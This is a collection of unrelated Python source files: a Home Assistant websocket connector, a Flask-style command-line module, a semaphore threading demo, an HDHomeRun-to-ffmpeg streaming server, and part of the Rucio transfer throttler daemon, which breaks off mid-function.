url = f"{proto}://{self._host}:{self._port}/api/websocket"
self._client = websocket.WebSocketApp(url, on_open=self._onOpen, on_message=self._onMessage)
self._workerThread = Thread(target=self._keep_connected_forever, args=(True,), daemon=True)
self._workerThread.start()
def _keep_connected_forever(self, ignoreBadSSLCerts):
while True:
try:
sslopt = {"cert_reqs":ssl.CERT_NONE} if ignoreBadSSLCerts else None
self._client.run_forever(sslopt=sslopt)
self._logger.info(f"Connection closed (reconnect in {self._autoReconnectIntervalInSecs} seconds)")
except Exception as ex:
self._logger.info(f"Connection closed (reconnect in {self._autoReconnectIntervalInSecs} seconds): " + str(ex))
time.sleep(self._autoReconnectIntervalInSecs)
def _onOpen(self, ws):
self._logger.info("Connected to homeassistant")
def _onMessage(self, ws, message):
try:
self._logger.debug("Message recieved: " + str(message))
data = json.loads(message)
msgType = data.get("type", "")
if msgType == "auth_required": self._sendAuth()
if msgType == "auth_ok": self._onAuthOk()
if msgType == "event":
if data["event"]["event_type"] == "state_changed": self._onStateChangedEvent(data)
if msgType == "result":
if data["id"] == self._requestCurrentStateMsgId: self._onCurrentEntityStatesResult(data)
except Exception as ex:
self._logger.exception("error while processing message: " + str(ex))
def _sendAuth(self):
self._logger.info("Sending Authentication")
self._client.send(json.dumps({"type": "auth", "access_token": self._accessToken}))
def _onAuthOk(self):
self._subscribeToEvents()
self._requestCurrentEntityStates()
def _onStateChangedEvent(self, data):
newState = data["event"]["data"]["new_state"]
self._saveEntityState(newState)
def _onCurrentEntityStatesResult(self, data):
for state in data["result"]:
self._saveEntityState(state)
def _saveEntityState(self, newState):
if newState["entity_id"] not in self._entities:
self._entities[newState["entity_id"]] = HomeAssistantEntityState()
self._entities[newState["entity_id"]].moveToThread(QGuiApplication.instance().thread())
self.entitiesChanged.emit(self._entities)
self._entities[newState["entity_id"]].state = newState["state"]
self._entities[newState["entity_id"]].attrs = newState["attributes"]
def _subscribeToEvents(self):
self._send({
"id": self._getNextMsgId(),
"type": "subscribe_events",
"event_type": "state_changed"
})
def _requestCurrentEntityStates(self):
self._requestCurrentStateMsgId = self._getNextMsgId()
self._send({
"id": self._requestCurrentStateMsgId,
"type": "get_states"
})
@pyqtProperty('QVariantMap', notify=entitiesChanged)
def entities(self):
return self._entities
@entities.setter
def entities(self, value):
self._entities = value
def _send(self, data):
if type(data) is not str:
data = json.dumps(data)
self._client.send(data)
self._logger.debug("Message sent: " + data)
@pyqtSlot(str, str, 'QVariantMap')
def callService(self, domain, service, data):
self._send({
"id": self._getNextMsgId(),
"type": "call_service",
"domain": domain,
"service": service,
"service_data": data
})
def _getNextMsgId(self):
self._msgId += 1
return self._msgId
@pyqtSlot(str, str)
def setClimatePresetMode(self, entityId, presetMode):
data = { "entity_id" : entityId, "preset_mode": presetMode}
self.callService("climate", "set_preset_mode", data)
@pyqtSlot(str, str)
def setHumidifierPresetMode(self, entityId, presetMode):
data = { "entity_id": entityId, "mode": presetMode }
self.callService("humidifier", "set_mode", data)
class HomeAssistantEntityState(QObject):
stateChanged = pyqtSignal(str)
attrsChanged = pyqtSignal(dict)
def __init__(self):
QObject.__init__(self)
self._attrs = {}
self._state = None
@pyqtProperty("QVariantMap", notify=attrsChanged)
def attrs(self):
return self._attrs
@attrs.setter
def attrs(self, value):
self._attrs = value
self.attrsChanged.emit(value)
@pyqtProperty(str, notify=stateChanged)
def state(self):
return self._state
@state.setter
def state(self, value):
if self._state == value: return
self._state = value
self.stateChanged.emit(value)
class ConnectorTypes(Enum):
Unknown = 0
HomeAssistant = 1
def createConnector(kind:str, name:str, config:dict):
if kind.casefold() == ConnectorTypes.HomeAssistant.name.casefold():
assert len(config.get("host","")) > 0, "Invalid host in connector " + name
assert len(config.get("accessToken")) > 0, "Invalid access_token in connector config " + name
con = HomeAssistantConnector(config["host"], config.get("port", 8123), config["accessToken"], config.get("useSSL", True))
con.connect()
return con
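# Hedged usage sketch (added; the host and token values are placeholders): this is
# how a connector could be wired up from a plain config dict. The function is not
# called anywhere in this module.
def _home_assistant_connector_example():
    config = {
        "host": "homeassistant.local",
        "port": 8123,
        "accessToken": "<long-lived-access-token>",
        "useSSL": False,
    }
    hass = createConnector("HomeAssistant", "livingroom", config)
    hass.entitiesChanged.connect(lambda entities: print(len(entities), "entities known"))
    return hass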
|
cli.py
|
# -*- coding: utf-8 -*-
"""
flaskr.cli
~~~~~~~~~
A simple command line application to run flaskr apps.
:copyright: (c) 2015 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import os
import sys
from threading import Lock, Thread
from functools import update_wrapper
import click
from ._compat import iteritems, reraise
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in 'app', 'application':
app = getattr(module, attr_name, None)
if app is not None and isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [v for k, v in iteritems(module.__dict__)
if isinstance(v, Flask)]
if len(matches) == 1:
return matches[0]
raise NoAppException('Failed to find application in module "%s". Are '
'you sure it contains a Flask application? Maybe '
'you wrapped it in a WSGI middleware or you are '
'using a factory function.' % module.__name__)
def prepare_exec_for_file(filename):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
module = []
# Chop off file extensions or package markers
if filename.endswith('.py'):
filename = filename[:-3]
elif os.path.split(filename)[1] == '__init__.py':
filename = os.path.dirname(filename)
else:
raise NoAppException('The file provided (%s) does exist but is not a '
'valid Python file. This means that it cannot '
'be used as application. Please change the '
'extension to .py' % filename)
filename = os.path.realpath(filename)
dirpath = filename
while 1:
dirpath, extra = os.path.split(dirpath)
module.append(extra)
if not os.path.isfile(os.path.join(dirpath, '__init__.py')):
break
sys.path.insert(0, dirpath)
return '.'.join(module[::-1])
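# Worked example (assumed package layout, added for clarity): for a file
# "project/pkg/app.py" where "project/pkg/__init__.py" exists but
# "project/__init__.py" does not, prepare_exec_for_file() inserts "project"
# into sys.path and returns the module name "pkg.app".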
def locate_app(app_id):
"""Attempts to locate the application."""
__traceback_hide__ = True
if ':' in app_id:
module, app_obj = app_id.split(':', 1)
else:
module = app_id
app_obj = None
__import__(module)
mod = sys.modules[module]
if app_obj is None:
app = find_best_app(mod)
else:
app = getattr(mod, app_obj, None)
if app is None:
raise RuntimeError('Failed to find application in module "%s"'
% module)
return app
class DispatchingApp(object):
"""Special application that dispatches to a flaskr application which
is imported by name in a background thread. If an error happens
it is recorded and shown as part of the WSGI handling, which in the case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=False):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc_info = None
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True
with self._lock:
try:
self._load_unlocked()
except Exception:
self._bg_loading_exc_info = sys.exc_info()
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True
exc_info = self._bg_loading_exc_info
if exc_info is not None:
self._bg_loading_exc_info = None
reraise(*exc_info)
def _load_unlocked(self):
__traceback_hide__ = True
self._app = rv = self.loader()
self._bg_loading_exc_info = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
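# Illustrative sketch (added; not part of the public API): wrap a loader so a WSGI
# server can start serving before the import has finished. 'hello' is a placeholder
# import path and the helper is never called from this module.
def _dispatching_app_example():
    info = ScriptInfo(app_import_path='hello')
    wsgi_app = DispatchingApp(info.load_app, use_eager_loading=False)
    # The first request blocks until the background import completes (or re-raises
    # whatever error the import produced).
    return wsgi_app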
class ScriptInfo(object):
"""Help object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click.
"""
def __init__(self, app_import_path=None, debug=None, create_app=None):
#: The application import path
self.app_import_path = app_import_path
#: The debug flag. If this is not None, the application will
#: automatically have its debug flag overridden with this value.
self.debug = debug
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
this multiple times will just result in the already loaded app to
be returned.
"""
__traceback_hide__ = True
if self._loaded_app is not None:
return self._loaded_app
if self.create_app is not None:
rv = self.create_app(self)
else:
if self.app_import_path is None:
raise NoAppException('Could not locate Flask application. '
'You did not provide FLASK_APP or the '
'--app parameter.')
rv = locate_app(self.app_import_path)
if self.debug is not None:
rv.debug = self.debug
self._loaded_app = rv
return rv
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
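# Short sketch (added; the command and the `database` helper are hypothetical):
# with_appcontext makes the loaded app's context active for the duration of the
# callback, so extensions bound to the app work inside CLI commands.
#
#   @click.command()
#   @with_appcontext
#   def init_db():
#       database.create_all()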
def set_debug_value(ctx, param, value):
ctx.ensure_object(ScriptInfo).debug = value
def set_app_value(ctx, param, value):
if value is not None:
if os.path.isfile(value):
value = prepare_exec_for_file(value)
elif '.' not in sys.path:
sys.path.insert(0, '.')
ctx.ensure_object(ScriptInfo).app_import_path = value
debug_option = click.Option(['--debug/--no-debug'],
help='Enable or disable debug mode.',
default=None, callback=set_debug_value)
app_option = click.Option(['-a', '--app'],
help='The application to run',
callback=set_app_value, is_eager=True)
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop('with_appcontext', True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault('cls', AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this.
For information as of why this is useful see :ref:`custom-scripts`.
:param add_default_commands: if this is True then the default run and
shell commands will be added.
:param add_app_option: adds the default :option:`--app` option. This gets
automatically disabled if a `create_app`
callback is defined.
:param add_debug_option: adds the default :option:`--debug` option.
:param create_app: an optional callback that is passed the script info
and returns the loaded app.
"""
def __init__(self, add_default_commands=True, add_app_option=None,
add_debug_option=True, create_app=None, **extra):
params = list(extra.pop('params', None) or ())
if add_app_option is None:
add_app_option = create_app is None
if add_app_option:
params.append(app_option)
if add_debug_option:
params.append(debug_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
def get_command(self, ctx, name):
# We load built-in commands first as these should always be the
# same no matter what the app does. If the app does want to
# override this it needs to make a custom instance of this group
# and not attach the default commands.
#
# This also means that the script stays functional in case the
# application completely fails.
rv = AppGroup.get_command(self, ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
try:
rv = info.load_app().cli.get_command(ctx, name)
if rv is not None:
return rv
except NoAppException:
pass
def list_commands(self, ctx):
# The commands available is the list of both the application (if
# available) plus the builtin commands.
rv = set(click.Group.list_commands(self, ctx))
info = ctx.ensure_object(ScriptInfo)
try:
rv.update(info.load_app().cli.list_commands(ctx))
except Exception:
# Here we intentionally swallow all exceptions as we don't
# want the help page to break if the app does not exist.
# If someone attempts to use the command we try to create
# the app again and this will give us the error.
pass
return sorted(rv)
def main(self, *args, **kwargs):
obj = kwargs.get('obj')
if obj is None:
obj = ScriptInfo(create_app=self.create_app)
kwargs['obj'] = obj
kwargs.setdefault('auto_envvar_prefix', 'FLASK')
return AppGroup.main(self, *args, **kwargs)
def script_info_option(*args, **kwargs):
"""This decorator works exactly like :func:`click.option` but is eager
by default and stores the value in the :attr:`ScriptInfo.data`. This
is useful to further customize an application factory in very complex
situations.
:param script_info_key: this is a mandatory keyword argument which
defines under which data key the value should
be stored.
"""
try:
key = kwargs.pop('script_info_key')
except LookupError:
raise TypeError('script_info_key not provided.')
real_callback = kwargs.get('callback')
def callback(ctx, param, value):
if real_callback is not None:
value = real_callback(ctx, value)
ctx.ensure_object(ScriptInfo).data[key] = value
return value
kwargs['callback'] = callback
kwargs.setdefault('is_eager', True)
return click.option(*args, **kwargs)
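# Hedged example (added; the option name and key are invented): used exactly like
# click.option, but the value also lands in ScriptInfo.data for an app factory to
# read later.
#
#   @script_info_option('--profile', script_info_key='profile', default='dev')
#   def cli_entry():
#       ...
#
#   # a create_app(info) factory could then look at info.data['profile'].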
@click.command('run', short_help='Runs a development server.')
@click.option('--host', '-h', default='127.0.0.1',
help='The interface to bind to.')
@click.option('--port', '-p', default=5000,
help='The port to bind to.')
@click.option('--reload/--no-reload', default=None,
help='Enable or disable the reloader. By default the reloader '
'is active if debug is enabled.')
@click.option('--debugger/--no-debugger', default=None,
help='Enable or disable the debugger. By default the debugger '
'is active if debug is enabled.')
@click.option('--eager-loading/--lazy-loader', default=None,
help='Enable or disable eager loading. By default eager '
'loading is enabled if the reloader is disabled.')
@click.option('--with-threads/--without-threads', default=False,
help='Enable or disable multithreading.')
@pass_script_info
def run_command(info, host, port, reload, debugger, eager_loading,
with_threads):
"""Runs a local development server for the Flask application.
This local server is recommended for development purposes only but it
can also be used for simple intranet deployments. By default it will
not support any sort of concurrency at all to simplify debugging. This
can be changed with the --with-threads option which will enable basic
multithreading.
The reloader and debugger are by default enabled if the debug flag of
Flask is enabled and disabled otherwise.
"""
from werkzeug.serving import run_simple
if reload is None:
reload = info.debug
if debugger is None:
debugger = info.debug
if eager_loading is None:
eager_loading = not reload
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
# Extra startup messages. This depends a bit on Werkzeug internals to
# not double execute when the reloader kicks in.
if os.environ.get('WERKZEUG_RUN_MAIN') != 'true':
# If we have an import path we can print it out now which can help
# people understand what's being served. If we do not have an
# import path because the app was loaded through a callback then
# we won't print anything.
if info.app_import_path is not None:
print(' * Serving Flask app "%s"' % info.app_import_path)
if info.debug is not None:
print(' * Forcing debug %s' % (info.debug and 'on' or 'off'))
run_simple(host, port, app, use_reloader=reload,
use_debugger=debugger, threaded=with_threads,
passthrough_errors=True)
@click.command('shell', short_help='Runs a shell in the app context.')
@with_appcontext
def shell_command():
"""Runs an interactive Python shell in the context of a given
Flask application. The application will populate the default
namespace of this shell according to its configuration.
This is useful for executing small snippets of management code
without having to manually configure the application.
"""
import code
from flask.globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = 'Python %s on %s\nApp: %s%s\nInstance: %s' % (
sys.version,
sys.platform,
app.import_name,
app.debug and ' [debug]' or '',
app.instance_path,
)
ctx = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get('PYTHONSTARTUP')
if startup and os.path.isfile(startup):
with open(startup, 'r') as f:
eval(compile(f.read(), startup, 'exec'), ctx)
ctx.update(app.make_shell_context())
code.interact(banner=banner, local=ctx)
cli = FlaskGroup(help="""\
This shell command acts as a general utility script for Flask applications.
It loads the application configured (either through the FLASK_APP environment
variable or the --app parameter) and then provides commands either provided
by the application or Flask itself.
The most useful commands are the "run" and "shell" command.
Example usage:
flaskr --app=hello --debug run
""")
def main(as_module=False):
this_module = __package__ + '.cli'
args = sys.argv[1:]
if as_module:
if sys.version_info >= (2, 7):
name = 'python -m ' + this_module.rsplit('.', 1)[0]
else:
name = 'python -m ' + this_module
# This module is always executed as "python -m flaskr.run" and as such
# we need to ensure that we restore the actual command line so that
# the reloader can properly operate.
sys.argv = ['-m', this_module] + sys.argv[1:]
else:
name = None
cli.main(args=args, prog_name=name)
if __name__ == '__main__':
main(as_module=True)
|
main.py
|
from threading import Thread, Semaphore
count = 0
sem = Semaphore(value=1)
def worker_a():
global count
sem.acquire()
count += 1
sem.release()
def worker_b():
global count
sem.acquire()
count += 1
sem.release()
a = Thread(target=worker_a)
b = Thread(target=worker_b)
a.start()
b.start()
a.join()
b.join()
print(count)
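# Note (added for clarity): Semaphore(value=1) acts as a mutex here, so the two
# increments cannot interleave and the script always prints 2. threading.Lock()
# would give the same guarantee.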
|
main.py
|
import socket
import sys
import datetime
import time
import os
import SimpleHTTPServer
import subprocess
import SocketServer
from threading import Thread
import time
import signal
import sys
import shutil
os.chdir("tcode")
timer=0
done=False
happening=False
p=False
def scanTuners():
p=subprocess.Popen(["hdhomerun_config","discover"],stdout=subprocess.PIPE)
x=p.communicate()[0]
return x.split("at")[1].rstrip().replace(" ","")
def ffmpeg_codecs():
x=subprocess.Popen(["ffmpeg","-codecs"],stdout=subprocess.PIPE, stderr=subprocess.PIPE)
y=x.communicate()[0]
return y.find("libfdk_aac")
channelComp=""
host=""
def start_ffmpeg():
global channelComp
global p
global host
acodecs=['libfdk_aac', '-ac:a:0', '2', '-vbr', '5']
if ffmpeg_codecs() == -1:
print "Hey. You. Get FFmpeg with libfdk_aac! Your ears will thank you!"
acodecs=["aac","-ac","2","-b:a:0","128k","-strict","-2"]
logfile = open('../ffmpeg_log.txt', 'w')
p=subprocess.Popen(["ffmpeg","-i","http://"+host+":5004/auto/v"+channelComp,"-vcodec","libx264","-preset","veryfast","-acodec"]+acodecs+["-vf","yadif=0:0:0","out.m3u8"],stdout=logfile,stderr=logfile)
def letsgo(chan):
global done
global timer
global p
global channelComp
global happening
ch=chan.split("_")
# http://192.168.0.149:5004/auto/v41.1
channelComp=ch[0]+"."+ch[1]
thread2 = Thread(target = start_ffmpeg)
thread2.start()
while done==False: # get 10MB of the file...
elapsed_time = time.time() - timer
print "here "+str(elapsed_time)+" "+str(timer)
if int(elapsed_time) > 20 and timer != 0:
done=True
happening=False
p.kill()
time.sleep(5)
print "over"
import glob
files = glob.glob('./*.ts')
for f in files:
os.remove(f)
os.remove("./out.m3u8")
happening=False
class CustomHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def end_headers(self):
self.send_header("Access-Control-Allow-Origin", "*")
SimpleHTTPServer.SimpleHTTPRequestHandler.end_headers(self)
def do_GET(self):
global done
global happening
global timer
elapsed_time = time.time() - timer
print elapsed_time
if timer==0 or elapsed_time < 20:
timer=time.time()
else:
print "Stream finished! Cleaning up!"
done=True
happening=False
if self.path.find("?chan="):
if happening==False:
ch=self.path.split("?chan=")
if len(ch)<2:
SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
return
print ch
ch=ch[1]
ch=ch.replace("/","")
print ch
try:
os.remove("./out.m3u8")
except:
pass
th = Thread(target = letsgo, args=(ch,))
th.start()
timer=0
done=False
happening=True
SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
host=scanTuners()
o=open("ip.txt","w")
o.write(host)
o.close()
#Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
SocketServer.TCPServer.allow_reuse_address=True
httpd = SocketServer.TCPServer(("", 7090), CustomHandler)
httpd.serve_forever()
|
throttler.py
|
# -*- coding: utf-8 -*-
# Copyright CERN since 2016
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Conveyor throttler is a daemon to manage rucio internal queue.
"""
from __future__ import division
import logging
import math
import threading
import traceback
import rucio.db.sqla.util
from rucio.common import exception
from rucio.common.logging import setup_logging
from rucio.common.utils import get_parsed_throttler_mode
from rucio.core import config as config_core
from rucio.core.monitor import record_counter, record_gauge
from rucio.core.request import get_stats_by_activity_direction_state, release_all_waiting_requests, release_waiting_requests_fifo, release_waiting_requests_grouped_fifo
from rucio.core.rse import get_rse, set_rse_transfer_limits, delete_rse_transfer_limits, get_rse_transfer_limits
from rucio.daemons.conveyor.common import run_conveyor_daemon
from rucio.db.sqla.constants import RequestState
graceful_stop = threading.Event()
def throttler(once=False, sleep_time=600, partition_wait_time=10):
"""
Main loop to check rse transfer limits.
"""
logging.info('Throttler starting')
logger_prefix = executable = 'conveyor-throttler'
run_conveyor_daemon(
once=once,
graceful_stop=graceful_stop,
executable=executable,
logger_prefix=logger_prefix,
partition_wait_time=partition_wait_time,
sleep_time=sleep_time,
run_once_fnc=run_once,
activities=None,
)
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, sleep_time=600):
"""
Starts up the conveyor threads.
"""
setup_logging()
if rucio.db.sqla.util.is_old_db():
raise exception.DatabaseException('Database was not updated, daemon won\'t start')
if once:
logging.info('running throttler one iteration only')
throttler(once=True, sleep_time=sleep_time)
else:
threads = []
logging.info('starting throttler thread')
throttler_thread = threading.Thread(target=throttler, kwargs={'once': once, 'sleep_time': sleep_time})
threads.append(throttler_thread)
[thread.start() for thread in threads]
logging.info('waiting for interrupts')
# Interruptible joins require a timeout.
while threads:
threads = [thread.join(timeout=3.14) for thread in threads if thread and thread.is_alive()]
def __get_request_stats(all_activities=False, direction='destination'):
"""
Retrieve stats about requests and collect transfer limits.
:param all_activities: Boolean whether requests are grouped by activity or if activities are ignored.
:param direction: String whether request statistics are based on source or destination RSEs.
"""
logging.info("Throttler retrieve requests statistics")
results = get_stats_by_activity_direction_state(state=[RequestState.QUEUED,
RequestState.SUBMITTING,
RequestState.SUBMITTED,
RequestState.WAITING], all_activities=all_activities, direction=direction)
result_dict = {}
limits = get_rse_transfer_limits()
for result in results:
if direction == 'destination' or direction == 'source':
account = result[0]
state = result[1]
rse = result[2]
counter = result[3]
rse_id = result[4]
if all_activities:
threshold = limits.get('all_activities', {}).get(rse_id, {}).get('max_transfers')
if threshold or (counter and (state == RequestState.WAITING)):
if rse_id not in result_dict:
result_dict[rse_id] = {'waiting': 0,
'transfer': 0,
'threshold': threshold,
'rse': rse,
'strategy': limits.get('all_activities', {}).get(rse_id, {}).get('strategy'),
'deadline': limits.get('all_activities', {}).get(rse_id, {}).get('deadline'),
'volume': limits.get('all_activities', {}).get(rse_id, {}).get('volume'),
'activities': {}}
if state == RequestState.WAITING:
result_dict[rse_id]['waiting'] += counter
else:
result_dict[rse_id]['transfer'] += counter
else:
activity = result[5]
threshold = limits.get(activity, {}).get(rse_id, {}).get('max_transfers')
if threshold or (counter and (state == RequestState.WAITING)):
if rse_id not in result_dict:
result_dict[rse_id] = {
'rse': rse,
'activities': {}
}
if activity not in result_dict[rse_id]['activities']:
result_dict[rse_id]['activities'][activity] = {'waiting': 0,
'transfer': 0,
'strategy': limits.get(activity, {}).get(rse_id, {}).get('strategy'),
'deadline': limits.get('all_activities', {}).get(rse_id, {}).get('deadline'),
'volume': limits.get('all_activities', {}).get(rse_id, {}).get('volume'),
'threshold': threshold,
'accounts': {}}
if account not in result_dict[rse_id]['activities'][activity]['accounts']:
result_dict[rse_id]['activities'][activity]['accounts'][account] = {'waiting': 0, 'transfer': 0}
if state == RequestState.WAITING:
result_dict[rse_id]['activities'][activity]['accounts'][account]['waiting'] += counter
result_dict[rse_id]['activities'][activity]['waiting'] += counter
else:
result_dict[rse_id]['activities'][activity]['accounts'][account]['transfer'] += counter
result_dict[rse_id]['activities'][activity]['transfer'] += counter
return result_dict
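# Shape of the returned dict, for orientation (example values are invented):
# with all_activities=True each RSE id maps to one aggregate bucket, e.g.
#   {rse_id: {'waiting': 10, 'transfer': 90, 'threshold': 100, 'rse': 'SITE_DISK',
#             'strategy': 'fifo', 'deadline': None, 'volume': None, 'activities': {}}}
# with all_activities=False the counters are nested per activity and per account:
#   {rse_id: {'rse': 'SITE_DISK', 'activities': {'User Subscriptions':
#             {'waiting': 5, 'transfer': 20, 'threshold': 50, 'accounts': {...}}}}}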
def run_once(worker_number=0, logger=logging.log, session=None, **kwargs):
"""
Schedule requests
"""
if worker_number != 0:
logger(logging.INFO, 'Throttler thread id is not 0, will sleep. Only thread 0 will work')
return True
logger(logging.INFO, "Throttler - schedule requests")
try:
throttler_mode = config_core.get('throttler', 'mode', default='DEST_PER_ACT', use_cache=False)
direction, all_activities = get_parsed_throttler_mode(throttler_mode)
result_dict = __get_request_stats(all_activities, direction)
if direction == 'destination' or direction == 'source':
for rse_id in result_dict:
rse_name = result_dict[rse_id]['rse']
availability = get_rse(rse_id).availability
# dest_rse is not blocklisted for write or src_rse is not blocklisted for read
if (direction == 'destination' and availability & 2) or (direction == 'source' and availability & 4):
if all_activities:
__release_all_activities(result_dict[rse_id], direction, rse_name, rse_id, logger=logger, session=session)
else:
__release_per_activity(result_dict[rse_id], direction, rse_name, rse_id, logger=logger, session=session)
except Exception:
logger(logging.CRITICAL, "Failed to schedule requests, error: %s" % (traceback.format_exc()))
return True
def __release_all_activities(stats, direction, rse_name, rse_id, logger, session):
"""
Release requests if activities should be ignored.
:param stats: Request statistics
:param direction: String whether request statistics are based on source or destination RSEs.
:param rse_name: RSE name.
:param rse_id: RSE id.
"""
threshold = stats['threshold']
transfer = stats['transfer']
waiting = stats['waiting']
strategy = stats['strategy']
if threshold is not None and transfer + waiting > threshold:
record_gauge('daemons.conveyor.throttler.set_rse_transfer_limits.{activity}.{rse}.{limit_attr}', threshold, labels={'activity': 'all_activities', 'rse': rse_name, 'limit_attr': 'max_transfers'})
record_gauge('daemons.conveyor.throttler.set_rse_transfer_limits.{activity}.{rse}.{limit_attr}', transfer, labels={'activity': 'all_activities', 'rse': rse_name, 'limit_attr': 'transfers'})
record_gauge('daemons.conveyor.throttler.set_rse_transfer_limits.{activity}.{rse}.{limit_attr}', waiting, labels={'activity': 'all_activities', 'rse': rse_name, 'limit_attr': 'waiting'})
if transfer < 0.8 * threshold:
to_be_released = threshold - transfer
if strategy == 'grouped_fifo':
deadline = stats.get('deadline')
volume = stats.get('volume')
release_waiting_requests_grouped_fifo(rse_id, count=to_be_released, direction=direction, volume=volume, deadline=deadline, session=session)
elif strategy == 'fifo':
release_waiting_requests_fifo(rse_id, count=to_be_released, direction=direction, session=session)
else:
logger(logging.DEBUG, "Throttler has done nothing on rse %s (transfer > 0.8 * threshold)" % rse_name)
elif waiting > 0 or not threshold:
logger(logging.DEBUG, "Throttler remove limits(threshold: %s) and release all waiting requests, rse %s" % (threshold, rse_name))
delete_rse_transfer_limits(rse_id, activity='all_activities', session=session)
release_all_waiting_requests(rse_id, direction=direction, session=session)
record_counter('daemons.conveyor.throttler.delete_rse_transfer_limits.{activity}.{rse}', labels={'activity': 'all_activities', 'rse': rse_name})
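# Worked example of the release logic above (numbers invented): with threshold=100,
# transfer=60 and waiting=50 the queue is over the limit (60 + 50 > 100), and since
# transfer < 0.8 * threshold, to_be_released = 100 - 60 = 40 waiting requests are
# released (grouped_fifo or fifo depending on the configured strategy). With
# transfer=85 instead, nothing is released because 85 >= 0.8 * 100.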
def __release_per_activity(stats, direction, rse_name, rse_id, logger, session):
"""
Release requests per activity.
:param stats: Request statistics
:param direction: String whether request statistics are based on source or destination RSEs.
:param rse_name: RSE name.
:param rse_id: RSE id.
"""
for activity in stats['activities']:
threshold = stats['activities'][activity]['threshold']
transfer = stats['activities'][activity]['transfer']
waiting = stats['activities'][activity]['waiting']
if waiting:
logger(logging.DEBUG, "Request status for %s at %s: %s" % (activity, rse_name,
stats['activities'][activity]))
if threshold is None:
logger(logging.DEBUG, "Throttler remove limits(threshold: %s) and release all waiting requests for activity %s, rse_id %s" % (threshold, activity, rse_id))
delete_rse_transfer_limits(rse_id, activity=activity, session=session)
release_all_waiting_requests(rse_id, activity=activity, direction=direction, session=session)
record_counter('daemons.conveyor.throttler.delete_rse_transfer_limits.{activity}.{rse}', labels={'activity': activity, 'rse': rse_name})
elif transfer + waiting > threshold:
logger(logging.DEBUG, "Throttler set limits for activity %s, rse %s" % (activity, rse_name))
set_rse_transfer_limits(rse_id, activity=activity, max_transfers=threshold, transfers=transfer, waitings=waiting, session=session)
record_gauge('daemons.conveyor.throttler.set_rse_transfer_limits.{activity}.{rse}.{limit_attr}', threshold, labels={'activity': activity, 'rse': rse_name, 'limit_attr': 'max_transfers'})
record_gauge('daemons.conveyor.throttler.set_rse_transfer_limits.{activity}.{rse}.{limit_attr}', transfer, labels={'activity': activity, 'rse': rse_name, 'limit_attr': 'transfers'})
record_gauge('daemons.conveyor.throttler.set_rse_transfer_limits.{activity}.{rse}.{limit_attr}', waiting, labels={'activity': activity, 'rse': rse_name, 'limit_attr': 'waiting'})
if transfer < 0.8 * threshold:
# release requests on account
nr_accounts = len(stats['activities'][activity]['accounts'])
if nr_accounts < 1:
nr_accounts = 1
to_release = threshold - transfer
threshold_per_account = math.ceil(threshold / nr_accounts)
to_release_per_account = math.ceil(to_release / nr_accounts)
accounts = stats['activities'][activity]['accounts']
for account in accounts:
if nr_accounts == 1:
logger(logging.DEBUG, "Throttler release %s waiting requests for activity %s, rse %s, account %s " % (to_release, activity, rse_name, account))
